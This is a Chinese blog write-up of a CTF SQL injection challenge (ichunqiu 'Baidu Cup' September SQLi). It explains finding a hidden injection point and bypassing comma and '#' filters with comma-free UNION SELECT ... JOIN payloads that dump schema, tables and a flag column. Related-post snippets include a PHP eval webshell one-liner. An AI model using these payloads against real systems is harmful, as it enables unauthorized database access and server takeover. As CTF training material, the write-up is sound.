[百度杯] 九月场第二周 Sqli writeup

最新推荐文章于 2022-07-06 11:55:39 发布
最新推荐文章于 2022-07-06 11:55:39 发布
阅读量1.8k 收藏 1
点赞数 2
分类专栏: ctf 文章标签: ctf sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37921080/article/details/79777795
版权

这道sql注入题折磨了我相当久,痛哭流涕啊!

拿到题,访问url:
http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/b68a89d1c4a097a9d8631b3ac45e8979.php
老套路,先看源码,提示 login.php?id=1 ,心里想着都是套路,然后访问url:
http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/login.php?id=1
页面显示:welcome admin! 哈哈哈,这么简单,开始注入吧!然后,就没有然后了,根本注入不出来,什么情况?
走投无路,看看前辈门的writeup吧。前辈说:访问页面时会经过一次302的重定向,然后在重定向的response的headers 里得到示:l0gin.php?id=1 注意这里的0是数字0。我用burpsuite抓包发现哪里有重定向啊?到底是哪里出了问题?为什么我找不到重定向的页面呢?经过几次测试发现是在访问http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/时发生了重定向,而且重定向到了
/b68a89d1c4a097a9d863lb3ac45e8979.php 和题目里面给定的url只有一字只差
b68a89d1c4a097a9d8631b3ac45e8979.php 一个是l一个是1,真是考研我的眼力啊! 然后果然在headers里发现了一个page字段,内容是l0gin.php?id=1 。总结一下上面的套路,重定向一般发生在访问域名而且不加参数或者文件夹名,文件名这样的情况下,比如直接访问http://90fefcf9ed494886b66499d44a5b4f7466e12887e8b44c96.game.ichunqiu.com/就会重定向到一个默认的页面文件。因该记住这个套路。
好了,跳过了第一个坑,得到的页面是这样的:
这里写图片描述
老实说,找这个注入点还是费了我很大的功夫,现在找出来了,回过头来看,发现又是那么简单,真是鬼迷了心窍啊!
做题过程中给我带来困难的就是哪个id列,有时候它会显示url中的id参数的全部,有时候有只会显示一部分,给我带来了很大的迷惑,现在想来它的显示规则是这样的:
当sql查询有结果时,就从结果里面提取出id,和username字段来进行显示;如果查询失败或者查询没有结果,那就从url参数里面提取进行过过滤处理的id参数 。
在知道这个条件的情况下,我们就可以判断注入语句到底有没有执行,而不受显示的id内容的干扰了。

1. 判断过滤掉的字符:

不用想,肯定是有waf的,那么知道过滤掉了哪些字符就很重要了。经过检测发现会截断 逗号, 井号#后面的值,当然也包括这两个符号。遇到这种情况我们肯定要想,能不能绕过过滤,比如用转换编码的方法 。要想验证绕过是否成功,那就需要注入点啊(起始寻找绕过waf方法,和寻找注入点有时候是交叉进行的)。由于没有对单引号进行过滤,我们先试一下
id =1 and 1 ; id=1 and 0这两种。
这里写图片描述
很不幸的是好像进行了一中特殊的过滤,使 id=1fdadsd 这样的参数直接识别为 id =1 而把后面的东西去掉。我也不晓得为啥要这样做。换一个字符型注入吧 : id =1’ and ‘1
这里写图片描述
查询成功,但是还不能确定注入代码是否执行,再用 : id=1’ and ‘0
这里写图片描述
查询无结果,说明我们的注入语句执行成功了。但是要想获得数据库内容,就要看看能不能绕过逗号的过滤。我们先试一下url编码的方式绕过#号过滤: (#的url编码是%23)
这里写图片描述
这里写图片描述
看来绕过了对#号的过滤,再看能不能绕过逗号:
这里写图片描述
结果是不幸的,不能用url编码绕过逗号的过滤,果然这道题的过滤是非常恼人的。然后怎么办?看前辈的writeup找到一中不使用逗号注入数据库的方法:
这里写图片描述
这里写图片描述
是不是觉得很奇怪,为啥显示的不一样。我觉得这也是一个关键点。对于表格类型的显位,比如题目中这样的,只会显示出查询结果中的一条记录,如果我们用 id =1 ’ union select …..这样的方式,那显示的就是id=1的查询结果,所以我们可以用
id=11’ union … 或者直接id= ’ union select …..
可以看到当前的数据库是sqli 。
让我们看一下有哪些数据库
id= ' union select * from (select group_concat(distinct(table_schema)) from information_schema.tables ) a join (select version() ) b %23
这里写图片描述
再看一下sqli里面有哪些表:
id=' union select * from (select group_concat(table_name ) from information_schema.tables where table_schema = 'sqli' ) a join (select version() ) b %23
这里写图片描述
再看一下有哪些字段:
id = ' union select * from (select group_concat(column_name ) from information_schema.columns where table_name = 'users' ) a join (select version() ) b %23
这里写图片描述
看一下flag_9c861b688330这个字段里的内容:
id=' union select * from (select group_concat(flag_9c861b688330 ) from users ) a join (select version() ) b %23
这里写图片描述
找到了!

Flyour
关注
专栏目录
百度CTF比赛 九月SQLi(多种姿势)
u011250160的博客
04-04 421
上题 进入网站,发现提示 按照提示访问http://91ad046335104584a1cc3f4e3a83513688ef3757714748d4.changame.ichunqiu.com/login.php?id=1 没有什么有用的信息 使用burpsuite抓包看下 同样没有什么有用的信息 用dirsearch扫下敏感目录 访问robots.txt出现nothing here 访问config.php没有得到信息 访问login.php得到error 访问index.php跳转到开始的load
SqliLab Less1-17 WriteUp
jhzzzz的博客
11-18 271
文章目录Union 注入盲注报错注入延时注入文件导入注入 Union 注入 盲注 报错注入 延时注入 文件导入注入
百度CTF比赛 九月 SQLi
weixin_43858799的博客
05-19 754
1、打开题目 一篇空白 发现一直在loading 还以为是网卡没加载 刷新几遍之后 发现原来都是套路 2、根据提示flag在后台 用bp抓包进行测试 看到 login.php?id=1 通过URL进行访问 发现没有什么可以用的信息 再用bp抓包 也灭有可以用信息 最后实在没办法了 看了官方的WP 才知道存在index.php 文件 并在hearder中有提示 通过URL访问...
百度CTF比赛 九月 SQLI
wyj_1216 House
04-06 309
题目来源 i春秋题库 writeup 1、一开始进去,啥都没有,那就查看页面源代码看看吧 发现了login.php?id=1 2、于是,进入到此页面看看 尝试进行注入,发现,并不是真正的注入点。 3、那就一起来找一下注入点吧 这里有个很坑的地方!!! 存在跳转!!! 具体发现方法,我也是拜读了大佬的博客才发现的 注意看上面两张图片, 发现了隐藏起来的关键点:l0gin.php?id=1 ...
百度CTF比赛 九月 SQL-writeup
wyj_1216 House
04-05 624
题目来源: “百度CTF比赛 九月 SQL(i春秋CTF题库) http://5a2ac0925dcc43de96dd1453e3b6c1e348f7b2c59f7c4fbd.changame.ichunqiu.com/index.php?id=1 writeup 1、判断有无注入点 发现,有过滤,尝试许多,参考大神思路,发现<>绕过and过滤 继续判断注入点有无 发现无...
百度CTF比赛 九月 SQL
weixin_43858799的博客
05-19 251
1、打开题目 提示flag通过注入拿到 2、开始常规的进行SQL注入 输入‘ order by 1 发现被过滤了 字符&&和||替换进行替换and 和or 发现没有显示过滤 发现order by被拦截 同样注释/**/也会被拦截。尝试用<>把字符隔 开。这里需要注意or<>der隔开是不对的,因为or又是一个被拦截的字符 所以使用 1’ o<&...
sqli-labs-master靶第二关详解
tangtang_888的博客
07-06 1802
1、点击进入sqli-labs-master靶第二关Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
SQLi Dumper v.8.3_sqli_
09-30
SQLi Dumper v.8.3_sqli_ 是一个专门针对SQL注入漏洞的渗透测试工具,主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全威胁,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,以获取未经授权的...
sqli-labs.rar
07-06
2. **盲注(Blind Injection)**:在返回结果受限或不明确的情况下,如只显示“成功”或“失败”的情况下,如何判断是否存在注入漏洞。这可能涉及到时间盲注(通过查询执行时间的差异来推断信息)和布尔盲注(通过...
百度CTF比赛 九月 SQL
SPS98
11-02 303
先放下参考链接:大方子的WP 还有自己以前写的mysql注入 —— union 平台那边的题目是这样的 很明确说是SQL注入,然后打开容器 很明显是要对id进行注入, 先不着急注入, 把id值变换看看 表面看上去只有两条数据的样子 那就先试下常用操作, 在1后面加个' 没有反应, 应该是出错或者屏蔽报错, 再加个#看看 依旧没反应, 再去掉' 从而可以推测出查询语句应该是sele...
百度CTF比赛 九月_YeserCMS
a173262565的博客
04-14 221
题目在i春秋ctf大本营 题目的提示并没有什么卵用,打开链接发现其实是easycms,百度可以查到许多通用漏洞 这里我利用的是无限报错注入 访问url/celive/live/header.php,直接进行报错注入 xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(Updat...
百度CTF比赛 九月SQLi ---------mozhe
weixin_40709439的博客
08-25 1481
题目链接:https://www.ichunqiu.com/battalion 点击进去,查看源代码  发现login.php?id=1 一般是存在sql注入的,可是我测试了好几遍,sqlmap也跑过了,也没发现啥 没办法,查看了官方wp,说是存在index.php,并在其header头有真正的注入点 在index.php请求进行301重定向,明显发现上面的链接只差一个字母,...
SQL注入】CTF练习题WriteUp——“百度CTF比赛 九月SQL
Fighting_hawk的博客
05-17 3606
1. 本题关键在于关键字的绕过,需要耐心+细心,一个个尝试。 2. 同时在练习过程中多记录累积一些绕过的方法,比如这一道题的。
百度-九月-sql
weixin_43622501的博客
11-25 157
SQL 收获 敏感词的可以用&lt;&gt;, /**/ 来绕过。 sql语句正确的格式。 题目描述: 首先 1=1 被过滤,尝试 and 发现也被过滤;试试绕过 and -&gt; &amp;&amp; or -&gt; || order by 猜长度 .game.ichunqiu.com/index.php?id=1 order by 2 --+ 仍然被过滤,敏感词过滤...
# “百度CTF比赛 九月SQLi
sinat_40845893的博客
01-02 254
百度CTF比赛 九月SQLi 数据库注入,无逗号union查询构造 求解流程: 进入题目,页面空白,查看源代码 <html> <head><title>Loading...</title></head> <body> <!-- login.php?id=1 --> </body> </html> 根据提示发送GET请求login.php?id=1 welcome admin~&
百度CTF比赛 九月-----Test
大方子
08-02 1401
========================================= 个人收获: 1.连接shell 失败的时候可以试试多个版本的菜刀,可能是菜刀的问题 2.学会了菜刀数据库管理的配置 ============================================ 题目界面: 这个是个cms,我就直接百度查询到现成的漏洞 漏洞地址:http://0day5...
百度CTF比赛 九月SQLi ---------i春秋
weixin_30907523的博客
07-07 115
题目链接:https://www.ichunqiu.com/battalion 打开链接,创建题目,进入题目环境 发现界面没有显示东西 查看一下源代码 发现源代码里注释了一条信息,login.php?id=1,访问一下 只返回了一条句子welcome admin~,尝试注入,结果没什么发现 进行抓包,访问index.php,在主界面获取到一个信息 刚开始以为和URL上...
10.28-“百度CTF比赛 九月-Web-upload
weixin_43460822的博客
10-29 337
进入题目的页面,如图所示 根据提示,可以猜测此题用的是文件上传漏洞,通过上传一句话木门,然后用菜刀连接获取服务器控制,接着查看flag.php文件即可得到flag。 一句话木门如下: <?php @eval($_POST['Cknife']);?> 发现可以上传成功,通过查看源代码可发现上传的位置,现在通过网址访问试试: 发现过滤了<?php,这是可以试试其他的php标记...
百度CTF比赛 九月 类型:Web 题目名称:SQLi
大方子
08-01 2801
收获的知识: 重定向一般发生在访问域名而且不加参数或者文件夹名,文件名这样的情况下 sql注入也要留意HTTP信息的变化 可以利用SQL map跑一下看看有没有有用的信息 不使用单引号和逗号的注入的注入技巧       发现页面空白 然后查看源文件 发现另一个页面 进去后出现   后来手测和用sqlmap跑感觉这不是一个注入点 看了别人的writeup之后发现...
sqlilabs第二关
最新发布
08-07
SQLI-LABS的第二关中,主要是围绕注入漏洞展开的。引用中给出了两个示例语句,一个是没有闭合的数字型注入,另一个是使用了闭合的字符串型注入。在这个关卡中,我们需要理解这两种不同的闭合方式对SQL语句的影响。...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值